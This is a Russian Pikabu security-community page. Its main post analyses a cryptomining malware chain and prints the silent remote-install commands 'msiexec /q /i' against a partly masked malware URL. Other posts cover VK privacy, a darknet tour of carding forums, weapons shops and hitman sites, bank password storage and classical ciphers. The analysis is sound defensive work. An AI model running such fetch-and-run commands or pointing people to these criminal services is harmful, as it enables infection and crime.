Сообщество - Информационная безопасность IT
Добавить пост

Информационная безопасность IT

1 412 постов 25 503 подписчика

Популярные теги в сообществе:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 19

Профиль ВКонтакте теперь можно закрыть от посторонних

Пожаловаться на действия человека с приватным аккаунтом смогут только его друзья, а не любой пользователь социальный сети

Профиль ВКонтакте теперь можно закрыть от посторонних ВКонтакте, Закрытый профиль, Приватность, Сокрытие страницы, Нововведение, Длиннопост

«ВКонтакте» провела реформу приватности, внедрив новый тип профиля — закрытый. Он скрывает все посты и действия пользователя от посторонних (всех людей, не состоящих в «друзьях»). Обновлённые настройки приватности уже доступны в веб-версии социальной сети и совсем скоро появятся в мобильных клиентах.

Профиль ВКонтакте теперь можно закрыть от посторонних ВКонтакте, Закрытый профиль, Приватность, Сокрытие страницы, Нововведение, Длиннопост

При выборе закрытого типа профиля, все отдельные настройки приватности автоматически принимают значение «Только друзья». Они останутся без изменений только в том случае, если ранее пользователь установил специфичные значения (например: «Только Маша и Арина» или «Только я»). При посещении закрытого профиля, посторонние смогут увидеть только основную информацию о человеке: имя и фамилию, аватар, возраст, город проживания, место работы, список общих друзей и количество публикаций (сами записи недоступны). Человек с закрытым аккаунтом по-прежнему может управлять уровнями доступа к конкретным записям.


Помимо прочего, отныне списки репостов публикаций видны только их авторам или администраторам (если пост опубликован в сообществе). Профили с закрытыми настройками приватности не отображаются в списках поделившихся даже авторам записей, хотя учитываются при подсчёте их количества.


Сделать аккаунт закрытым через мобильные клиенты можно будет с выходом ближайшего обновления.

Очевидно, что вышеописанная реформа приватности создана из-за нескольких громких случаев, когда людей обвиняли в экстремизме и прочих уголовных преступлениях за репосты и лайки записей ВКонтакте. Однако социальная сеть по-прежнему будет выдавать правоохранительным органам информацию о конкретном человеке.


Отличие закрытого профиля от открытого заключается лишь в том, что, в случае с приватным аккаунтом, пожаловаться на пользователя в полицию смогут только его друзья, в то время как действия человека с открытым профилем видны всем.


Итог:

— По умолчанию ваш профиль остаётся открытым. Закрыть его можно в настройках приватности: vk.com/settings?act=privacy.

— Профиль будет закрыт от всех пользователей, которых нет у вас в друзьях. Ваши друзья по-прежнему смогут видеть всю ранее доступную им информацию.

— Посторонние пользователи в закрытом профиле будут видеть: имя и фамилию, актуальную главную фотографию (без возможности открыть её и посмотреть предыдущие), список общих друзей, счётчики с количеством друзей и записей, а также статус, возраст, город и место работы (если эти пункты заполнены).

— При установке закрытого типа профиля все настройки приватности автоматически сбрасываются на «Только друзья» либо же остаются прежними, если они были с более строгими параметрами: например, «Никто». При открытии профиля настройки вернутся в прежнее состояние.

— При закрытии профиля владелец страницы будет видеть табличку о том, что профиль доступен не всем. С неё можно сразу перейти в настройки приватности.

https://vk.com/wall-2158488_800198

Показать полностью 1

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3

Этот пост не удаляйте, тут нет ничего, что бы заставить вас купить наркоту или тп..

Форумы

RAMP

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Очередной русскоязычный полуфорум-полумаркет для волшебников. Общение отсутствует, обсуждение взлома, безопасности, криптографии, сливов, малвари, кардинга и так далее запрещается уже при регистрации, во время которой ты обязан две минуты пыриться в этот список запретов. Вся активность на сайте сводится к торговле волшебством.

The Hub

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Унылый англоязычный форум про все, что не разрешено в белых пушистых интернетах. Подавляющее большинство комментариев — в разделах For Beginners, Darknet In General и Off Topic, что как бы намекает на качество аудитории и обсуждений. Без JavaScript не работает. Раздел Vendors содержит унылые попытки самопиара огромного количества каких-то барыг и натянутые однообразные обзоры различных минимаркетов. Боже, как же это утомляет.

Закрытые хакерские форумы и сайты

Хакерские темы можно найти тут и там, но специализированные форумы по большей части не отличаются дружелюбностью, и даже свободная регистрация — редкость. К примеру, вход на Hell, один из наиболее известных форумов, стоит 0,1 BTC (порядка 60 долларов)

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

GroundZero, SiphON и BlackHat на первый взгляд выглядят открытыми, но подозрительно пустыми. Можно не сомневаться, что все самое интересное спрятано в разделах, которые не видны простому посетителю.

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

При регистрации на большинстве таких форумов предлагают ввести код приглашения, и, даже если ты им владеешь, не факт, что тебе будут сразу же открыты все ветки. Немало публичных разделов есть на форуме 0day, но можешь не сомневаться — и тут тоже основная движуха происходит в разделах, куда с улицы не попадешь.

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

В открытом доступе остается совсем немного. Самый популярный топик — это кардинг: заливы, CVV, обналичка для различных платежных систем, способы обхода антифрода, обсуждения того, где брать дампы. В общем, боевым кроберам с «Кардер Плэнет» здесь будет скучновато, но если просто интересует тема, что-то новое ты точно узнаешь: почитай FAQ и покликай по ссылкам для новичков, которыми щедро делится сообщество.


Что касается остальных разделов в паблике, то тут сплошное огорчение: шанс найти 0day в целом ниже, чем в clearnet. Зато можешь заглянуть в раздел Accounts and Database Dumps, иногда встречаются знакомые слова вроде VK или Rambler.


Конечно же, персональные сайты в дарквебе есть и у хакерских групп. В качестве примера можешь глянуть CyberGuerrilla, The Hack Lair, Hacker4Hire и Hackmasters, но, признаться честно, ловить там особо нечего. Выделяется разве что биржа «Анонимного интернационала», где можно принять участие в торгах, на которых разыгрывают содержимое аккаунтов российских чиновников.

Оружие, шпионаж, спецоперации

Runion

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Russian Onion Union — наиболее популярный и познавательный русскоязычный форум дарквеба, специализирующийся на защите и самозащите. В разделе «Оружие» можно найти основные понятия и FAQ по оружию, инструкции и книги по изготовлению самодельных средств защиты, расчеты мощности взрывчатых веществ, обсуждение военной техники, оружия и боеприпасов, уроки по самообороне и диверсиям, а также предупреждения знающих людей об оружейных веб-форумах, торгующих информацией о своих посетителях.


В разделе «Техника безопасности» обсуждаются методы прослушки, слежки, обнаружения и защиты от них, типичные ошибки начинающих анонимусов и громкие ошибки известных террористов. Есть FAQ, правила и советы по безопасному поведению в различных странах мира, а также способы обхода официальных запретов, сокрытия потенциальных улик и «заметания следов». Инструкция под названием «Санитарный день», перечисляющая способы поддержания личной информационной чистоты, будет полезна любому посетителю, даже если он зашел на форум с самыми невинными намерениями.


Раздел «Защита информации» расскажет тебе о методах шифрования и скрытия трафика, безопасных сервисах и утилитах, а также о способах повышения абузоустойчивости некоторых популярных программ, девайсов и веб-серверов. Тема под названием «Tails: FAQ», объясняющая, что такое The Amnesic Incognito Live System, будет отличным стартом для совершающего свои первые шаги анонимуса.

Raegdan’s Fukken Saved

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Русскоязычный архив, содержащий полные и частичные дампы некоторых «почищенных» в свое время clearnet-сайтов. Для любителей оружия тут есть немало интересного.


Дамп оружейного форума steelrats.org, хранящий контент на конец 2012 года. Форум содержит некоторое количество материалов по кустарному конструированию вооружения, спецсредств и разведывательной техники. Можешь сравнить с Runion и оценить, как жалко в то время выглядел анонимус.

Чертежи, фотосеты и видеоинструкции по 3D-печати самодельного оружия, сохраненные с не существующего уже сайта американца Джеймса Патрика. Оружие, правда, годится только для самозащиты, потому как пластиковое.

Руководства юного повстанца по сколачиванию собственной вооруженной банды: «Азбука домашнего терроризма», «Партизанская война» и «Учебник городского партизана». Разумеется, после чтения этих книг никакого «городского партизана» из тебя не получится (партизаны вообще книги не особо читают), но это может помочь лучше понимать психологию бандитов и уклониться от контактов с ними, если возникнут массовые беспорядки.

Cryptostorm

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Tor-версия форума одноименного VPN-провайдера Cryptostorm, расположенного в Исландии. Довольно познавательный англоязычный ресурс, содержащий обсуждения по защите и шифрованию информации о личной жизни и перемещениях. В основном, разумеется, содержит разделы, посвященные работе VPN Cryptostorm и развитию их утилиты для «абсолютной защиты» Cryptostorm Widget. Раздел Stormphone содержит небольшую, но ценную информацию и обсуждения по теме защиты данных на мобильных устройствах.

Black Market

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Магазин, позиционирующий себя как «Номер один в сети Tor» и ведущий себя практически как легальный. Владельцы утверждают, что предоставляют гарантию качества во всех странах мира, оружие проверено и может быть заменено в случае его отказа (в течение одной недели), в цены уже включена доставка, а при доставке прикладываются десять бесплатных патронов. Одним словом, эпичный и весьма красивый развод, впечатление от которого не портит даже указанный в списке товаров золотой Desert Eagle. Действительно, вдруг кто-то хочет анонимно и скрытно купить пистолет, чтобы хвастаться им перед друзьями. Почему бы и нет.

Black Market Guns

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

В противовес предыдущему — настоящий магазин оружия, расположенный в США и легально торгующий разрешенным в США оружием, деталями, запчастями и боеприпасами. Содержит 26 позиций, среди которых есть даже пара приборов ночного видения. Владельцы молчаливо обходят все вопросы легализации покупки на стороне покупателя, предлагая лишь доставку с помощью FedEx. Пристрелянный товар и инструкции по сборке в комплекте. Официальный email на tutanota.com также заставляет поверить в серьезность предложения. Но мы, конечно, не проверяли.

No Background Check Gun Store

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Магазин неизвестного происхождения (подозреваем, владельцы — из США, но подтверждения нигде нет), позиционирующий себя как «самый большой каталог оружия в Deep Web». Количество позиций действительно впечатляет: владельцы предлагают на выбор 570 пистолетов, 230 винтовок и 30 помповых ружей. Выбор настолько велик, что присутствует поиск по каталогу. Смущают только три факта: круглое количество позиций в разделах, почта на gmail.com и наиболее знаменитые производители в каждой из категорий. Слишком красиво, чтобы быть правдой.

Euro Guns и UK Guns

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост
Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Два магазина одного владельца, работающие, соответственно, с территории Европы (предположительно Нидерландов) и Великобритании. Владелец заботливо предлагает покупателям регистрацию (зачем?), реферальную программу с отчислением в 1% (а, так вот зачем), несколько способов покупки биткойнов за наличные и бесплатную доставку. Ассортимент при этом небольшой и абсолютно одинаковый, что и заставляет предположить наличие общего владельца (а скорее всего, вообще одного человека, который не находится ни в Великобритании, ни в Европе).

MaskRabbit

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Веселый сайт, позиционирующий себя как «анонимное агентство для выполнения операций в реальном мире». Специализируется на доставке, воровстве, шпионаже, саботаже, бандитизме и взломах. При этом сразу же и веселит тем фактом, что заявляет о работе «только с профессиональными агентами», одновременно предлагая отправить заявку на вступление в ряды этих самых «агентов». Отдохни, 47-й, тебе найдена достойная замена — видишь, пришло письмо от Васи из Воронежа!

C’thulhu

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Еще более веселый сайт, одно название которого уже говорит о высоком профессиональном уровне его создателей. Намерения «организованной криминальной группировки C’thulhu» настолько серьёзны, что им приходится объяснять, почему ты должен нанять именно их и именно через Tor. На резонный вопрос «Где пруфы, Билли? Нам нужны пруфы!» разработчики веско отвечают: мы удаляем все пруфы после выполнения заказа (для вашей же безопасности), а у наших заказчиков совершенно нет времени сидеть на форумах и отвечать на какие-либо письма. Nuff said.


Впрочем, градус веселья несколько снижает наличие публичного PGP-ключа, email на bitmessage.ch и подробный прайс. Возможно, за нарочито нелепым, «отводящим глаза» фасадом все же скрывается серьезный бизнес.

Besa Mafia

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Совсем не смешной сайт действующей албанской мафиозной группировки. Открывай, только убедившись в отсутствии рядом детей.


Besa Mafia действует на территории США, Канады, Европы и многих других стран, предлагая такие жестокие услуги, как выбивание долгов (с членовредительством), убийство для устрашения (впрочем, скрытное устранение тоже), поджигание автомобилей и домов, а также продажу незарегистрированного оружия. В разделах сайта можно найти инструкции по сохранению анонимности при заказе, пошаговое описание безопасного процесса оплаты заказа, прайс-лист, FAQ и даже дисклеймер, в котором заявляется, что услуги Besa Mafia предоставляются исключительно в целях защиты клиента от нависшей над ним угрозы. Чтобы сделать заказ, нужно указать контакт человека, который уже состоит в группировке, иначе ты сам можешь стать следующей целью. Создатели сайта также заявляют, что не являются исполнителями: они посредники и получают за это 20% от суммы. Исполнитель получает 80%.


Ну как, поверил? Достаточно убедительно? А теперь правда: этот сайт — полицейский скам. Администраторы Besa Mafia сливают переписку с «заказчиками» и контакты «исполнителей» в правоохранительные органы разных стран. Если ты параноик, ты мог это заподозрить еще в момент просмотра раздела «Видео»: выложенные там ролики — простая нарезка из американских новостей, которая подтягивается с YouTube и не работает без JavaScript. Впрочем, после слива Silk Road подобным скамом является большинство сайтов в Tor.

Прочие полезности

Dead Drop — сервис для передачи шифрованных сообщений. Для регистрации нужен ключ PGP, он же поможет оставить послание без адресата. Желающие прочесть его смогут для этого ввести твой публичный ключ, и сервис выдаст текст.


Deep Web Radio. Учитывая, что напрягов с музыкой в «чистом вебе» особо нет, существование подпольной радиостанции обосновать непросто. Но тем не менее она существует. Можешь слушать один из пяти «эфиров» и тащиться от того, что делаешь это через Tor.

Секреты Даркнета. Ищем полезное в скрытых сервисах Tor. Часть 3 Deepweb, Даркнет, Интернет, Длиннопост

Bitcoin Block Explorer, зеркало блокчейин.инфo — сайта, который помогает отслеживать транзакции Bitcoin.


Keybase — зеркало Keybase.io. Он позволяет связать свои публичные ключи PGP с пользовательским профилем. Зарегистрироваться не помешает, но помни, что Keybase славится длинной виртуальной очередью, которую нужно отстоять, прежде чем пришлют приглашение.


Cryptome — зеркало легендарного сайта о приватности и криптографии Cryptome.org. Последний раз синхронизировано в 2013 году, но пока основной сайт никуда не девался, смысл вместо него пользоваться скрытым сервисом под сомнением.


Итого

Конечно, взять и обозреть весь дарквеб невозможно. В первую очередь потому, что две тысячи ссылок — это все же две тысячи ссылок и пройти их все нелегко (да и не нужно). Общую идею ты наверняка уловил, и, надеемся, на вопросы «что посмотреть?» и «откуда начать?» мы ответили.


Второй, еще более важный момент — «дарк» в слове «даркнет» все же подразумевает, что сайты скрыты от посторонних и пробраться на них с наскока невозможно. Никакое индексирование не спасет, и тут нужен индивидуальный подход.


В целом открытая часть дарквеба настолько напоминает интернет девяностых годов с его характерным антидизайном и общей безалаберностью, что прямо накатывает ностальгия. Главные отличия: сайтов в Onion сильно меньше и они значительно криминальнее. Зато здесь можно, словно в старые добрые времена, заниматься сетевым серфингом и чувствовать, как со всех сторон обдувает ветер свободы!

Источник

Показать полностью 16

Безопасность локального банка

Всем привет.
Приходится пользоваться картой центр-инвест банка (банк, работающий преимущественно в Ростовской области). Изначально, регистрируясь в онлайн приложении ЦИ, меня заставили придумать 8-значный цифровой пароль для входа в панель управления аккаунтом. Было очень неудобно каждый раз вводить 8 цифр, но что поделаешь...
И вот в чем, собственно, загвоздочка: с месяц - другой тому назад пришло обновление, в котором нужно вводить уже 4х символьный пароль. При этом, первые 4 цифры моего 8-значного пароля подходят!
Это что получается, банк хранит пароли в открытом виде? Я не вижу возможности сравнить контрольную сумму полного пароля, с КС обрезанного пароля на соответствие.
Мб, конечно, я что-то не понимаю в этом мире, но сейчас, как только на мой счет поступают денежные средства, я сразу их обналичиваю.

История криптографии: от стеганографии до сложных алгоритмов. Часть 3

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

Шифр Виженера

Из прошлой части мы выяснили, что полиалфавитный шифр – это последовательность многих моноалфавитных шифров. И одним из наиболее известных полиалфавитов является шифр Виженера. В нём для зашифровывания текста используется какое-либо слово (фраза, текст), и стойкость итогового сообщения зависит исключительно от длины ключа. Приведём пример использования этого шифра:

В качестве примера возьмём кодовое слово – КАРТА, а текст:


Был яркий холодный апрельский день.


Первым делом необходимо убрать все пунктуационные знаки и пробелы в предложении, после удаления должен получиться такой текст:


Быляркийхолодныйапрельскийдень


После, к каждой букве текста мы сопоставляем каждую букву нашего ключа:

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост
Проверка описания

Сам шифротекст мы получаем путём поочерёдной замены каждой буквы в тексте. Буква «К» является двенадцатой по счёту в алфавите, и под ней находящаяся буква «Б» является второй буквой по счёту. Зашифрованный символ – номер буквы их суммы (12+2=14, буква «М» – четырнадцатая по счёту).

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

И после всех действий из данного текста мы получаем полностью нечитабельный текст, который к тому же не поддаётся привычному частотному анализу и не очень лёгок во взломе.

Для удобства можно использовать квадрат Виженера, где показаны все варианты смещения.

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

К сожалению, такой способ оказался не очень удобным для криптографов, несмотря на поразительную стойкость для того времени, ведь главный недостаток такого способа – это критично медленная скорость шифровки и дешифровки сообщений.


Всё это привело к тому, что криптоаналитики начали искать некий компромисс, между стойкостью шифра и его простотой в использовании.


Для военной связи требовались скорость и простота, а в дипломатических учреждениях ежедневно отправляли и получали сотни сообщений, поэтому время имело существенное значение.


Омофонический шифр

Именно этот шифр и стал тем компромиссом между стойкостью и простотой. Основной идеей омофонического шифра было использование нескольких символов (цифр, иероглифов) для одной буквы, чтобы не допустить нахождения самого частовстречающегося символа и проведения дальнейшего анализа текста. К примеру частота появлений буквы «О» в русском тексте составляется 9-11%, а это значит, что для этой буквы будет около 9-11 разных символов.

В итогом сообщении, нам необходимо добиться равного распределения всех символов, чтобы они имели одинаковую частоту появлений в тексте (примерно 1-2%)

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

Вариант использования омофонического шифра:

Необходимо зашифровать слово АНАНАС, в этом слове есть несколько повторяющихся букв, и будет показан принцип поочерёдной замены. Для этого воспользуемся таблицей сверху, где первая строчка показывает частоту появлений буквы в обычном тексте, и ниже приведены варианты её замены. Чем чаще встречается буква, тем больше вариаций необходимо.

125 (А) 336 (Н) 854 (А) 905 (Н) 981 (А) 291 (С)

Каждый раз, когда начинает повторяться буква, необходимо брать следующее значение из таблицы. После всех преобразований получился набор чисел, который не имеет одинаковых значений:

125 336 854 905 981 291

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

Криптоанализ

Однако, если этот шифр и скрывает частоту появлений букв, то он не скрывает особенности языка. Каждая буква в тексте связана определённым образом с другими буквами, например в английском языке после «Q» всегда идёт «U» (кроме названий объектов, имён и т.д.), и по такой цепочке можно постепенно начать расшифровывать весь текст.


Хотя омофонический шифр можно взломать, но он гораздо более надежен, чем простой одноалфавитный шифр.


Исторический пример

История криптографии: от стеганографии до сложных алгоритмов. Часть 3 Шифр, Криптография, Длиннопост

